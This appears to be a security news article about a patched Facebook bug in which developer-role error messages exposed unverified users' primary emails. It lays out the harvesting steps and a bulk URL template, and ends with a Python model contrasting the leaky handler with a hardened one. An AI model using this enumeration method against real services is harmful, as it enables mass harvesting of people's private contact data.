Last week we explained a critical vulnerability in Facebook that disclosed the primary email address of any Facebook user. The bug was later patched by the Facebook Security Team.
Today another similar and interesting Facebook hack was disclosed by another bug hunter, Roy Castillo. On his blog he explained a new Facebook hack method that allows anyone to easily grab the primary email addresses of billions of Facebook users.
Facebook provides an App Dashboard for creating and managing your Facebook apps, with a range of tools to help you configure, build and debug them.
The flaw exists in the App settings, where an application admin can also add a developer's profile; if that user is not a verified user, an error message on the page discloses his primary email address.
Using the following steps, one was able to grab the email addresses of all Facebook users:
- Collect profile links of all Facebook users from the Facebook People Directory, i.e. https://www.facebook.com/directory/people/
- Collect the numerical Facebook ID for each profile from the Facebook Graph API, e.g. https://graph.facebook.com/mohitkumar.thehackernews, where the extracted user ID is 1251386282
- Create a Facebook Application -> go to Settings -> Developer Roles and try to add a Developer profile. If it is a verified ID, the application will accept it; otherwise an error message will display the email address of that profile.
- To submit the profile ID directly from URL parameters: https://developers.facebook.com/apps/APPLICATION_ID/roles?unverified_groups[1][0]=VICTIM_UID
Where APPLICATION_ID is the application ID and VICTIM_UID is the numerical ID of the Facebook profile collected in step 2.
To submit more profiles in bulk:
https://developers.facebook.com/apps/APPLICATION_ID/roles
?unverified_groups[1][0]=VICTIM_UID1
&unverified_groups[2][0]=VICTIM_UID2
&unverified_groups[3][0]=VICTIM_UID3
&unverified_groups[4][0]=VICTIM_UID4
&unverified_groups[5][0]=VICTIM_UID5
&unverified_groups[6][0]=VICTIM_UID6
&unverified_groups[7][0]=VICTIM_UID7
&unverified_groups[8][0]=VICTIM_UID8
&unverified_groups[9][0]=VICTIM_UID9
&unverified_groups[10][0]=VICTIM_UID10
and so forth...
This way an attacker is able to dump the primary email addresses of any number of Facebook users at once. The bug was reported to the Facebook Security Team by Roy, and he was rewarded with $4500 under the bug bounty program.
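The root cause described above is an error message that reflects a stored attribute (the primary email) of a user the caller merely referenced by ID. The following added example is not Facebook's code or Roy Castillo's; it is a constructed model of the role-add endpoint with a hypothetical in-memory user store, showing the leaky responder beside a hardened one that only echoes the caller-supplied ID, plus a request-level cap on bulk entries (an assumed value, not Facebook's real limit) and a check a reviewer can run to confirm no email ever reaches the response.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample user store: uid -> (email, verified). All values are hypothetical.
USERS = {
    100000000001: ("alice@example.com", True),
    100000000002: ("bob@example.com", False),
    100000000003: ("carol@example.com", False),
}

# Matches the unverified_groups[N][0]=UID parameter shape from the article.
KEY_RE = re.compile(r"^unverified_groups\[(\d+)\]\[0\]$")

MAX_ROLE_ADDS_PER_REQUEST = 5  # assumption: a sane per-request cap, not Facebook's real limit


def parse_role_request(query: str) -> list:
    """Extract every UID carried in unverified_groups[N][0] parameters."""
    return [int(v) for k, v in parse_qsl(query) if KEY_RE.match(k) and v.isdigit()]


def add_developer_vulnerable(uid: int) -> str:
    """Reproduces the flaw: the error text echoes the unverified user's email."""
    email, verified = USERS.get(uid, (None, False))
    if email is None:
        return "error: no such user"
    if not verified:
        return f"error: {email} must verify their account before being added"
    return "ok: developer added"


def add_developer_hardened(uid: int) -> str:
    """Fixed form: same outcome, but the response refers only to the caller-supplied ID."""
    email, verified = USERS.get(uid, (None, False))
    if email is None or not verified:
        # Log the detail server-side if it is needed for debugging; never reflect PII.
        return f"error: user {uid} cannot be added as a developer"
    return "ok: developer added"


def handle_bulk(query: str, handler) -> list:
    """Process one roles request, refusing batches above the cap."""
    uids = parse_role_request(query)
    if len(uids) > MAX_ROLE_ADDS_PER_REQUEST:
        return ["error: too many role changes in one request"]
    return [handler(u) for u in uids]


def leaks_email(responses: list) -> bool:
    """Regression check: does any response contain a stored email address?"""
    emails = {e for e, _ in USERS.values()}
    return any(e in r for r in responses for e in emails)
```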